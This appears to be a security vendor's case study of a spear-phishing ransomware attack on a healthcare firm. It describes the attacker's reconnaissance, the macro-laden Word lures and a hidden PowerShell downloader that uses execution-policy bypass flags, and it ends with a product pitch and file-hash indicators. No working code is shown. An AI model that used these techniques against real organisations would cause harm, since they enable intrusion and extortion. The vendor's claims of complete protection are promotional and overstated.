We recently saw a targeted ransomware attack against a large healthcare firm. We developed this case study to show how ransomware typically infiltrates such an organization, and how it can cause considerable damage if not prevented. Targeted attacks against an organization are not rare. However, in this case the adversaries went out of their way to carefully construct a wave of spear phishing attacks. In addition to illustrating the attack, we include the technical details, along with indicators of compromise, showing the spear phish emails, weaponized Office documents, and ransomware techniques used.
The High Value of Targeting Healthcare
Before delving into the methodology of the attack, it is important to understand what factors played a role in how and why the adversary chose its target. Adversaries have a variety of options when deciding the attack vector and payload of a targeted attack. In this case the adversary chose ransomware as the choice payload for the attack. Most ransomware variants today use powerful algorithms to encrypt files. This leaves the victim no choice but to pay the ransom anonymously over Tor using bitcoins in order to decrypt the files. In 2015 health technology was the most profitable sector and is projected to be the most profitable again in 2016 with a 21.6% profit margin. Given this information, it’s clear that there is a significant revenue upside in targeting a medical technology firm with ransomware.
The adversary chose a spear phishing campaign as the attack vector in this case. People have a natural desire to be informed and are inclined to click on things that grant them access to insider information. Spear phishing uses target-specific information to undermine access control policies and bait a potential victim into an exploit—or to volunteer proprietary information. Even when the information is unsolicited or the sender of the message is unrecognized, a well-crafted spear phish that hinges on the precepts of social engineering (psychological manipulation) can still be very effective. In today’s workforce, an attack like this can cripple an entire company if not caught and addressed in a timely manner. An infection that starts out on one computer can quickly spread over the network to other machines and file repositories. If this happens the enterprise is in crisis, forced to take down their own internal networks and systems to prevent the spread. Alternatively, they can choose to pay the ransom to obtain the decryption key and decrypt all the files, perhaps not even knowing if the decryption keys would work. It’s a tough decision that most CISOs don’t ever want to face.
Targeting the Healthcare Firm
Adversaries in an effective spear phishing campaign begin by conducting reconnaissance. The adversary looks for specific information from a company that they can use to bait employees. A lot of information can be discovered relatively easily with simple Google searches or browsing social media websites. People often check in at specific locations on Foursquare, post their phone number (area code included), email address, common friends, and employment history on Facebook and/or LinkedIn. Adversaries will study press releases, investor calls, and public presentations in order to hone in on their target(s).
Once an adversary gains enough relevant information, they use it to craft legitimate looking emails to employees to furthermore execute their malicious plan. The adversary can employ social engineering tactics to persuade the victim to volunteer more critical information then turn around and sell it in the underground market for large sums of money. The information can be in the form of employee personally identifiable information, company secrets, or other sensitive information that could be damaging if leaked. Alternatively, the adversary can use this information to deliver ransomware via a weaponized document, which is becoming the case quite frequently.
Technical Analysis of Attack
To properly carry out a spear phishing campaign, the adversary must gather relevant information of a targeted group of individuals, corporate computer image, OS version, patch schedule, network edge firewall, proxy, open ports, and other important information. In this case, the adversary used the company’s name along with other industry-specific keywords to craft emails to employees in the firm. The adversary used weaponized document attachments with names related to the company and its respective industry.
Figure 1: WINWORD process opening malicious document
Figure 2: Malicious document names
Weaponized documents – which contain embedded Visual Basic application, batch, or other scripts – are quite frequently used in spear phishing attacks. They are used to distribute a wide variety of malicious payloads. Upon opening the document, the victim is still safe from the malicious script. However, the document is purposefully not entirely visible until macros are enabled to run. The victim will usually see a message similar to that in Figure 3 that requests permission to enable macros.
Figure 3: MS Word enabling macros in document
Once macros are authorized to run the host machine is essentially infected. The embedded macro kicks off the execution of a script, in this case a powershell script, that makes a variety of changes to the system.
Figure 4: Malicious powershell script
A few things to note in this powershell script:
The script runs in the background with the “–windowstyle” flag set to hidden and the – The hidden window makes the prompt open and close very quickly. The victim may see the prompt pop up very briefly but cannot do anything about it. The –nop flag does not load the windows powershell profile.
By default, powershell does not allow scripts to execute without elevated privileges. The –ep (execution policy) bypass flag allows the script to run without administrative consent.
While running stealthily in the background, the script uses the WebClient to download the malicious binary from the specified website and executes it with the WScript.Shell class. With the exception of the brief powershell window popup, the victim is completely oblivious to the malicious activity happening in the background.
Figure 5: X by Invincea catching the malicious binary being created and executed
Preventing Similar Attacks
X by Invincea machine learning next-generation antivirus is deployed in conjunction with other security tools in the enterprise. The fact that the threat was able to reach the endpoint without being caught by the other security tools in front of the endpoint begs the question, “how did such malicious content get inside?”
With spam filters, proxies, and other prevention tools in place, attackers must find ways to circumvent these prevention techniques to ensure the malicious email reaches their victims. In order to combat this there are basic email conventions that companies can follow to avoid adversaries gaining access to employee email addresses. The typical <FirstName.LastName>@<CompanyName>.com is quite easy to guess. More advanced steps can be taken to prevent these types of emails from reaching a company email server. A network proxy that sits at the edge of a corporate network can immediately filter out traffic and emails from known malicious domains or websites. In an attempt to get past these spam filters, adversaries sometimes set up their own personal email servers and phish victims from unfamiliar domain names.
Most of the known email providers (Gmail, Yahoo, etc.) have pretty thorough email spam filters that block traffic coming from smaller email servers. For enterprise hosted mailing servers, these spam filters must be constantly adjusted to keep up with the rate at which adversaries create new email domains and spam from there.
There are many more security tools and techniques that can be implemented to prevent phishing attacks, such as Antivirus at the gateway our outsourcing email through a third party scrubbing service like Messagelabs. The problem is they are all mitigation techniques and do not fully secure the endpoint. If one of these control systems fails in its duty due to an outage or misconfiguration, the attack may reach the endpoint. Fortunately, the healthcare firm in this case study had X by Invincea machine learning next-generation antivirus in place. X by Invincea is proven to block threats like the ones in this case study. When malware slips through the cracks of other preventative tools, X by Invincea catches and kills these infections before they can spread and cause more damage on the network. It stops weaponized Office documents, ransomware, and eliminates the threat of spear phishing… all of the techniques used against this (very satisfied) X by Invincea customer.
Appendix: IOC’s
d7552f20e54fd2dfe17f685e05a452e8e641e55ba1206877a4e49b63dedfb30c
38f74f1c1e701df9638f55a82507c0e521bbc77ffa69f06d8e72c6d54aa05806
9d9872eae7dae5de461ad9bf0028e22bbb1ba0302af599ed903c38b0fe50972b
aa258362b690d15c9ee8ae16cac1b54c2a4103e254efe85cba68745ea4eec7c1
2ec134d2bc1c7275b46066c23ae1acd3a286863e9efe27b19436eca54b2dce41
23ae65200c6e2b11f1dfa4dc42355c2c161faa264cebe7fa62222f337a9e53f1
bb0f3c91a95561c94a40091b92ea7d33a08035893abb7968d614812e68e5a4d3
690638a04b627e7e0f6b651977ae356d2ccc10eecc62a5e217b642d74deaf529